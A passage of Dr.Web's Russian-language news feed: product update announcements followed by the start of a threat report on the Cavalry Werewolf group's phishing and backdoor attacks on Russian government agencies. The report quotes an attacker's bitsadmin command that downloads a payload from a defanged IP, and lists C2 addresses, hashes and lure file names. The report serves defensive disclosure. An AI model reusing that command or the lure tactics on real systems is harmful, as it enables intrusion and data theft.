GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Компания «Доктор Веб» выпустила обновление для бесплатной утилиты Dr.Web CureIt!, наделив её уникальной функцией — возможностью проверять файлы и папки, внесённые вирусописателями в список исключений антивирусных программ. Это серьёзный шаг в борьбе со сложными угрозами, которые целенаправленно отключают системы защиты для беспрепятственной работы в системе.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Новая функция стала прямым следствием успешной работы другого продукта компании — Dr.Web FixIt!, применяемого специалистами компании для расследования инцидентов и лечения сложных заражений. Многие вредоносные программы, попав на компьютер, первым делом пытаются внести собственные исполняемые файлы в список исключений антивирусной защиты, что делает систему уязвимой: антивирусное ПО, будучи обманутым, игнорирует вредоносные объекты, позволяя злоумышленникам беспрепятственно красть данные, шифровать файлы или использовать ресурсы компьютера в бот-сетях.&lt;/p&gt;&lt;p&gt;Как работает новая функция:&lt;/p&gt;&lt;ol&gt;&lt;li&gt;При запуске проверки Dr.Web CureIt! теперь автоматически считывает и анализирует списки исключений установленного или встроенного антивируса.&lt;/li&gt;&lt;li&gt;Все файлы и папки, найденные в этих списках, подвергаются тщательной проверке с помощью антивирусного ядра Dr.Web.&lt;/li&gt;&lt;li&gt;Если в исключениях обнаруживается вредоносный объект, Dr.Web CureIt! уведомляет пользователя и удаляет угрозу.&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;Это нововведение критически важно для обычных пользователей, которые могут не подозревать, что их система защиты была скомпрометирована. Теперь, даже если вирус попытается спрятаться «на виду», Dr.Web CureIt! сможет его найти и обезвредить.&lt;/p&gt;&lt;h3&gt;Планы на будущее: скорая экспертная помощь для Linux&lt;/h3&gt;&lt;p&gt;Опираясь на успешный опыт применения сервиса Dr.Web FixIt! для Windows, «Доктор Веб» также готовится к выпуску полноценной версии сервиса для Linux, который нацелен на помощь ИБ-специалистам в расследовании кибератак на корпоративную инфраструктуру.&lt;br&gt;Сейчас вы можете использовать утилиту Dr.Web FixIt! для Linux для отправки информации о системе в нашу техническую поддержку. Утилита &amp;nbsp;теперь расположена на новой странице - &lt;a href="https://free.drweb.ru/sysinfo/"&gt;https://free.drweb.ru/sysinfo/&lt;/a&gt;&amp;nbsp;&lt;br&gt;В дальнейшем, наработки, полученные в этой версии, позволят создать утилиту Dr.Web CureIt! и для обычных пользователей, которые смогут быстро проверить и вылечить свои ПК под управлением Linux от последствий заражения.&lt;/p&gt;&lt;p&gt;Скачать обновлённую версию Dr.Web CureIt! можно бесплатно* на официальном сайте: &lt;a href="https://free.drweb.ru/download+cureit+free/"&gt;https://free.drweb.ru/download+cureit+free/&lt;/a&gt;&lt;/p&gt;&lt;p&gt;*Бесплатно только для персонального использования.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15082&amp;lng=ru</guid><title>Защитите близких от телефонных аферистов с новой функцией «Антимошенник»</title><link>https://news.drweb.ru/show/?i=15082&amp;lng=ru&amp;c=5</link><pubDate>Tue, 18 Nov 2025 08:43:56 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;В приложении для безопасности детей и взрослых в цифровом пространстве &lt;a href="https://products.drweb.ru/home/family_security/"&gt;Dr.Web Family Security&lt;/a&gt; появилась новая функция «Антимошенник», которая эффективно защищает от телефонных мошенников и предотвращает шантаж.&amp;nbsp;&lt;/newslead&gt;&lt;/p&gt;&lt;h3&gt;&lt;strong&gt;Как работает «Антимошенник»&lt;/strong&gt;&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;Помогает держать руку на пульсе. Вы, как администратор – глава семьи, можете установить лимит времени для звонков со скрытых и незнакомых номеров. Например, всего 1 минуту. Этого достаточно, чтобы сказать «алло», но слишком мало для манипуляций и выуживания информации.&lt;/li&gt;&lt;li&gt;Обрывает атаки мошенников на старте. Чем короче разговор, тем меньше шансов у злоумышленника втереться в доверие и получить коды из смс, данные карты или пароли. Вы лишаете их главного оружия — времени.&lt;/li&gt;&lt;li&gt;Позволяет не упустить важное. Если важный звонок попал под фильтр, просто добавьте номер в «Список разрешенных» – и звонки с этого номера вы сможете принимать без ограничений. Полный контроль без потери связи.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Также в этом релизе мы повысили стабильность работы приложения и провели внутреннюю оптимизацию.&amp;nbsp;&lt;br&gt;Обновленная версия Dr.Web Family Security уже доступна в Google Play и скоро будет доступна на официальном сайте drweb.ru и в магазинах приложений RuStore и AppGallery. Следите за обновлениями!&lt;/p&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15080&amp;lng=ru</guid><title>Выпущено обновление серверов централизованного управления Dr.Web Enterprise Security Suite и Dr.Web Industrial</title><link>https://news.drweb.ru/show/?i=15080&amp;lng=ru&amp;c=5</link><pubDate>Fri, 07 Nov 2025 09:00:00 GMT</pubDate><description>&lt;newslead&gt;Вышло обновление серверов Dr.Web Enterprise Security Suite и Dr.Web Industrial. Новая версия включает улучшения стабильности и новые инструменты централизованного управления действиями при обнаружении угроз на устройствах под управлением Android. Для получения всех преимуществ и корректной работы системы пользователям рекомендуется обновить серверы до актуальной версии.&lt;/newslead&gt;&lt;p&gt;В новой версии сервера Dr.Web Enterprise Security Suite реализованы изменения, направленные на повышение управляемости системы защиты. Также изменения произошли и в рамках продукта для защиты мобильных устройств под управлением ОС Android, что обеспечивает полноценный контроль антивирусной защиты со стороны Центра управления.&lt;/p&gt;&lt;p&gt;Данное обновление добавляет возможность централизованно управлять действиями компонентов Сканер и SpIDer Guard при обнаружении различных типов угроз на устройствах под управлением ОС Android. Теперь администратор может задать, как агент Dr.Web будет реагировать на угрозы — уведомлять, удалять или игнорировать их в зависимости от категории.&lt;/p&gt;&lt;p&gt;Настройки, ранее представленные как параметры «Проверять на наличие рекламных программ» и «Проверять на наличие потенциально опасных программ», заменены новым механизмом выбора действий. Если эти проверки были отключены, после обновления по умолчанию к соответствующим программам будет применяться действие «Игнорировать». В остальных случаях используется действие «Сообщать».&lt;/p&gt;&lt;div class="alert"&gt;&lt;p&gt;&lt;strong&gt;Важно для пользователей&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;&lt;/div&gt;&lt;p&gt;Чтобы воспользоваться всеми возможностями новой версии и обеспечить корректную работу компонентов защиты, необходимо обновить серверы централизованного управления до актуальной версии.&lt;br&gt;Обновление доступно для загрузки через веб-интерфейс консоли управления.&lt;br&gt;При возникновении вопросов по настройке или планированию обновления администраторы антивирусных сетей могут обратиться за консультацией в Службу технической поддержки.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15079&amp;lng=ru</guid><title>Обновленная версия Dr.Web для мобильных устройств с умной системой защиты</title><link>https://news.drweb.ru/show/?i=15079&amp;lng=ru&amp;c=5</link><pubDate>Fri, 07 Nov 2025 09:00:00 GMT</pubDate><description>&lt;newslead&gt;Вышел релиз антивирусных продуктов для защиты смартфонов, планшетов и других устройств на базе ОС Android. Основные улучшения касаются автоматизации защиты и стабильности работы.&lt;/newslead&gt;&lt;h3&gt;Что делает этот релиз особенным&lt;/h3&gt;&lt;p&gt;Новая функция автоматической обработки угроз, которая позволяет решениям Dr.Web удалять вредоносные объекты, блокировать подозрительные ссылки или изолировать потенциально опасные приложения без задержек и ручного вмешательства пользователя.&amp;nbsp;&lt;/p&gt;&lt;h3&gt;Что это значит для пользователей&lt;/h3&gt;&lt;p&gt;Теперь у пользователей персональных устройств нет необходимости следить за всеми уведомлениями об угрозах, как раньше, потому что можно полностью исключить ручное реагирование. Это сделано для того, чтобы реакция антивирусного продукта не зависела от ответа пользователя на уведомления системы об обнаруженных угрозах и действиях с ними. Интеллектуальная система, разработанная специалистами «Доктор Веб», самостоятельно устраняет угрозы в режиме реального времени в соответствии с заданными параметрами реагирования на те или иные типы вредоносного ПО.&amp;nbsp;&lt;br&gt;Особенно порадует это решение корпоративных пользователей. Автоматическое удаление вредоносных объектов, блокировка подозрительных ссылок и многие другие действия происходят мгновенно без непосредственного участия администраторов. Функция также поддерживается и со стороны Центра управления.&lt;/p&gt;&lt;h3&gt;Администрирование стало еще удобнее&lt;/h3&gt;&lt;p&gt;Данное обновление добавляет возможность централизованно управлять действиями компонентов Сканер и SpIDer Guard при обнаружении различных типов угроз на устройствах под управлением ОС Android. Теперь администратор может задать, как агент Dr.Web будет реагировать на угрозы — уведомлять, удалять или игнорировать их в зависимости от категории.&lt;/p&gt;&lt;div class="alert"&gt;&lt;p&gt;&lt;strong&gt;Важное уведомление!&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;&lt;/div&gt;&lt;p&gt;Начиная с новой версии прекращается поддержка Android ОС версии 4.4. Просьба обратить на это внимание при обновлении.&amp;nbsp;&lt;/p&gt;&lt;p&gt;Если вы используете версию Dr.Web Security Space для мобильных устройств, скачанную с официального сайта «Доктор Веб», для обновления необходимо полностью переустановить приложение — скачайте последнюю версию агента и установите ее.&amp;nbsp;&lt;/p&gt;&lt;p&gt;Для пользователей Dr.Web Security Space для мобильных устройств, скачавших приложение из Google Play, использующих Dr.Web по подписке (Dr.Web Мобильный или Dr.Web Расширенный) или Dr.Web Mobile Security Suite, обновление пройдет в штатном режиме.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb.ru/show/?i=15078&amp;lng=ru</guid><title>Хакерская группировка Cavalry Werewolf атакует российские государственные учреждения</title><link>https://news.drweb.ru/show/?i=15078&amp;lng=ru&amp;c=5</link><pubDate>Thu, 06 Nov 2025 00:00:00 GMT</pubDate><description>&lt;div class="vir_rev_btn center"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/cavalry_werewolf/Cavalry_Werewolf_ru.pdf" class='btn'&gt;Скачать PDF&lt;/a&gt;
&lt;/div&gt;
&lt;p&gt;&lt;b&gt;6 ноября 2025 года&lt;/b&gt;&lt;/p&gt;
&lt;h3&gt;Введение&lt;/h3&gt;
&lt;p&gt;&lt;newslead&gt;В июле 2025 года в компанию «Доктор Веб» обратился клиент из государственного сектора Российской Федерации с подозрением о возможной компрометации внутренней сети. Гипотеза возникла в связи с тем, что клиент зафиксировал рассылку нежелательных сообщений с одного из корпоративных почтовых ящиков. Проведенное нашей антивирусной лабораторией расследование инцидента показало, что учреждение подверглось целевой атаке со стороны хакерской группировки, которую специалисты «Доктор Веб» идентифицировали как Cavalry Werewolf. Одной из целей кампании был сбор конфиденциальной информации и данных о конфигурации сети.&lt;/newslead&gt;&lt;/p&gt;
&lt;p&gt;В ходе экспертизы удалось выявить ранее неизвестные вредоносные программы, в том числе инструменты с открытым исходным кодом. Среди них — различные бэкдоры, позволяющие дистанционно выполнять команды в атакуемых системах и подготовить площадку для разведки и дальнейшего закрепления в сетевой инфраструктуре.&lt;/p&gt;
&lt;p&gt;В данном исследовании мы расскажем о выявленных инструментах хакеров Cavalry Werewolf, рассмотрим особенности группировки и характерные для злоумышленников действия в скомпрометированной сети.&lt;/p&gt;
&lt;h3&gt;Общие сведения об атаке и используемые инструменты&lt;/h3&gt;
&lt;p&gt;Для получения первоначального доступа к одному из компьютеров злоумышленники использовали распространенный вектор проникновения — фишинговые электронные письма с прикрепленным к ним вредоносным ПО, замаскированным под документы. В данном случае сообщения содержали неизвестный на момент атаки бэкдор &lt;a href="https://vms.drweb.ru/search/?q=BackDoor.ShellNET.1&amp;lng=ru"&gt;&lt;b&gt;BackDoor.ShellNET.1&lt;/b&gt;&lt;/a&gt;, который основан на ПО с открытым кодом &lt;a href="https://github.com/xcyraxx/Reverse-Shell-CS" target="_blank"&gt;Reverse-Shell-CS&lt;/a&gt;. Он позволяет дистанционно подключаться к зараженным компьютерам через обратный шелл и выполнять различные команды. Эта вредоносная программа располагалась в защищенном паролем архиве и, в зависимости от рассылки, имела различные имена.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Варианты имен файлов BackDoor.ShellNET.1&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;Службеная записка от 16.06.2025___________________________.exe&lt;/span&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;О ПРЕДОСТАВЛЕНИИ ИНФОРМАЦИИ ДЛЯ ПОДГОТОВКИ СОВЕЩАНИЯ.exe&lt;/span&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;О проведении личного приема граждан список участников.exe&lt;/span&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;О работе почтового сервера план и проведенная работа.exe&lt;/span&gt;&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;div class="column_grid_review column_grid_review--o" style="margin-bottom:12px;"&gt;
    &lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/october/cavalry_werewolf/01_phishing.2.png"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/cavalry_werewolf/01_phishing.2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;em&gt;Пример фишингового письма с &lt;b&gt;BackDoor.ShellNET.1&lt;/b&gt;. Атакующие предлагают потенциальной жертве ознакомиться с «документом» и указывают пароль для распаковки архива&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Используя &lt;b&gt;BackDoor.ShellNET.1&lt;/b&gt;, злоумышленники продолжили закрепление в целевой системе. Они загрузили несколько вредоносных программ через стандартное для ОС Windows средство Bitsadmin (&lt;span class="string"&gt;C:\Windows\SysWOW64\bitsadmin.exe&lt;/span&gt;), предназначенное для управления заданиями по передаче файлов. Приложение запускалось с набором определенных ключей командной строки и от имени текущего администратора системы, как показано на примере ниже:&lt;/p&gt;
&lt;div class="grid"&gt;
&lt;pre&gt;&lt;code&gt;cmd: bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/winpot.exe 
C:\users\public\downloads\winpot.exe&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
&lt;p&gt;Первой из угроз, загруженных через &lt;b&gt;BackDoor.ShellNET.1&lt;/b&gt;, была троянская программа-стилер &lt;a href="https://vms.drweb.ru/search/?q=Trojan.FileSpyNET.5&amp;lng=ru"&gt;&lt;b&gt;Trojan.FileSpyNET.5&lt;/b&gt;&lt;/a&gt;. С ее помощью киберпреступники скачали хранившиеся на компьютере документы в форматах .doc, .docx, .xlsx и .pdf, текстовые файлы (.txt), а также изображения (.jpg, .png).&lt;/p&gt;
&lt;p&gt;Затем атакующие установили бэкдор &lt;a href="https://vms.drweb.ru/search/?q=BackDoor.Tunnel.41&amp;lng=ru"&gt;&lt;b&gt;BackDoor.Tunnel.41&lt;/b&gt;&lt;/a&gt; (представляет собой ПО с открытым исходным кодом &lt;a href="https://github.com/Acebond/ReverseSocks5" target="_blank"&gt;ReverseSocks5&lt;/a&gt;) с целью создания SOCKS5-туннелей и незаметного подключения к компьютеру для дальнейшего выполнения на нем команд, в том числе — с возможностью установки другого вредоносного ПО.&lt;/p&gt;
&lt;h3&gt;Инструменты Cavalry Werewolf&lt;/h3&gt;
&lt;p&gt;Расследование данного инцидента позволило выявить не только указанные выше вредоносные приложения, но и множество других инструментов группировки, которые хакеры используют для проведения таргетированных атак. Отметим, что вирусописатели из Cavalry Werewolf не ограничиваются единым набором вредоносных программ и постоянно пополняют свой арсенал. Поэтому инструменты для проникновения в целевые системы, а также последующие в цепочке заражения стадии могут отличаться в зависимости от атакуемой организации.&lt;/p&gt;
&lt;h3&gt;Точка входа&lt;/h3&gt;
&lt;p&gt;Вредоносные программы в фишинговых письмах от Cavalry Werewolf являются первыми ступенями в цепочке заражения. При этом они могут быть представлены разным типом вредоносного ПО. Вирусные аналитики «Доктор Веб» выявили следующие варианты:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;скрипты (&lt;a href="https://vms.drweb.ru/search/?q=BAT.DownLoader.1138&amp;lng=ru"&gt;&lt;b&gt;BAT.DownLoader.1138&lt;/b&gt;&lt;/a&gt;);&lt;/li&gt;
    &lt;li&gt;исполняемые файлы (&lt;a href="https://vms.drweb.ru/search/?q=Trojan.Packed2.49708&amp;lng=ru"&gt;&lt;b&gt;Trojan.Packed2.49708&lt;/b&gt;&lt;/a&gt;, &lt;a href="https://vms.drweb.ru/search/?q=Trojan.Siggen31.54011&amp;lng=ru"&gt;&lt;b&gt;Trojan.Siggen31.54011&lt;/b&gt;&lt;/a&gt;, &lt;a href="https://vms.drweb.ru/search/?q=BackDoor.Siggen2.5463&amp;lng=ru"&gt;&lt;b&gt;BackDoor.Siggen2.5463&lt;/b&gt;&lt;/a&gt;, &lt;a href="https://vms.drweb.ru/search/?q=BackDoor.RShell.169&amp;lng=ru"&gt;&lt;b&gt;BackDoor.RShell.169&lt;/b&gt;&lt;/a&gt;, &lt;a href="https://vms.drweb.ru/search/?q=BackDoor.ReverseShell.10&amp;lng=ru"&gt;&lt;b&gt;BackDoor.ReverseShell.10&lt;/b&gt;&lt;/a&gt;).&lt;/li&gt;
&lt;/ul&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BAT.DownLoader.1138&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Является пакетным файлом, который загружает в целевую систему PowerShell-бэкдор &lt;b&gt;PowerShell.BackDoor.109&lt;/b&gt;. С его помощью злоумышленники скачивают и запускают на компьютере другие вредоносные программы.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Известные имена файлов BAT.DownLoader.1138&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1-хеш&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;С2-сервер&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;scan26_08_2025.bat&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;d2106c8dfd0c681c27483a21cc72d746b2e5c18c&lt;/td&gt;
            &lt;td&gt;168[.]100.10[.]73&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;Trojan.Packed2.49708&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Устанавливает бэкдор &lt;b&gt;BackDoor.Spy.4033&lt;/b&gt;, который в зашифрованном виде хранится в его теле. Этот бэкдор позволяет атакующим выполнять команды в инфицированной системе через обратный шелл.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Известные имена файлов Trojan.Packed2.49708&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1-хеш&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;С2-сервер&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;О проведении личного приема граждан список участников план и проведенная работа.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string" style="text-wrap: nowrap;"&gt;C:\Windows\2o1nzu.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;5684972ded765b0b08b290c85c8fac8ed3fea273&lt;/td&gt;
            &lt;td&gt;185[.]173.37[.]67&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;29ee3910d05e248cfb3ff62bd2e85e9c76db44a5&lt;/td&gt;
            &lt;td&gt;185[.]231.155[.]111&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;О работе почтового сервера план и проведенная работа.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string"&gt;Программный офис Управления Организации Объединенных Наций по наркотикам и преступности (УНП ООН).exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string"&gt;План-протокол встречи о сотрудничестве представителей должн.лиц.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;ce4912e5cd46fae58916c9ed49459c9232955302&lt;/td&gt;
            &lt;td&gt;109[.]172.85[.]95&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string" style="text-wrap: nowrap;"&gt;C:\Windows\746wljxfs.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;653ffc8c3ec85c6210a416b92d828a28b2353c17&lt;/td&gt;
            &lt;td&gt;185[.]173.37[.]67&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;—&lt;/td&gt;
            &lt;td&gt;b52e1c9484ab694720dc62d501deca2aa922a078&lt;/td&gt;
            &lt;td&gt;109[.]172.85[.]95&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;Trojan.Siggen31.54011&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Устанавливает бэкдор &lt;b&gt;BackDoor.Spy.4038&lt;/b&gt;, который в зашифрованном виде хранится в его теле. Этот бэкдор позволяет атакующим выполнять команды в инфицированной системе через обратный шелл.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://vms.drweb.ru/search/?q=Trojan.Siggen31.54011&amp;lng=ru"&gt;&lt;b&gt;Trojan.Siggen31.54011&lt;/b&gt;&lt;/a&gt; функционально схож с вредоносной программой &lt;a href="https://vms.drweb.ru/search/?q=Trojan.Packed2.49708&amp;lng=ru"&gt;&lt;b&gt;Trojan.Packed2.49708&lt;/b&gt;&lt;/a&gt;, но имеет несколько иной алгоритм извлечения полезной нагрузки.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;SHA1-хеш&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;С2-сервер&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;baab225a50502a156222fcc234a87c09bc2b1647&lt;/td&gt;
            &lt;td&gt;109[.]172.85[.]63&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;93000d43d5c54b07b52efbdad3012e232bdb49cc&lt;/td&gt;
            &lt;td&gt;109[.]172.85[.]63&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BackDoor.Siggen2.5463&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Выполняет задания киберпреступников и управляется ими через Telegram-бот. Основная функциональность вредоносной программы расположена в PowerShell-коде, скрытом в ее теле.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Известные имена файлов BackDoor.Siggen2.5463&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1-хеш&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;Полезная нагрузка&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string"&gt;system.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;c96beb026dc871256e86eca01e1f5ba2247a0df6&lt;/td&gt;
            &lt;td&gt;&lt;b&gt;PowerShell.BackDoor.108&lt;/b&gt;&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BackDoor.RShell.169&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Позволяет злоумышленникам дистанционно подключаться к зараженным компьютерам через обратный шелл для выполнения различных команд.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Известные имена файлов BackDoor.RShell.169&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1-хеш&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;С2-сервер&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string"&gt;Информация по письму в МИД от 6 июля статус и прилагаемые документы.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;633885f16ef1e848a2e057169ab45d363f3f8c57&lt;/td&gt;
            &lt;td&gt;109[.]172.85[.]63&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BackDoor.ReverseShell.10&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Запускает обратный шелл и обеспечивает злоумышленникам дистанционный доступ к системе.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Известные имена файлов BackDoor.ReverseShell.10&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1-хеш&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;С2-сервер&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;к проектам.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string"&gt;Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа проектов к проектам.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;dd98dcf6807a7281e102307d61c71b7954b93032&lt;/td&gt;
            &lt;td&gt;195[.]2.78[.]133&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td style="text-align:start;"&gt;
                &lt;span class="string" style="white-space: pre-wrap;"&gt;Служебная записка от 20.08.2025&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp; &amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;&amp;ensp;.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
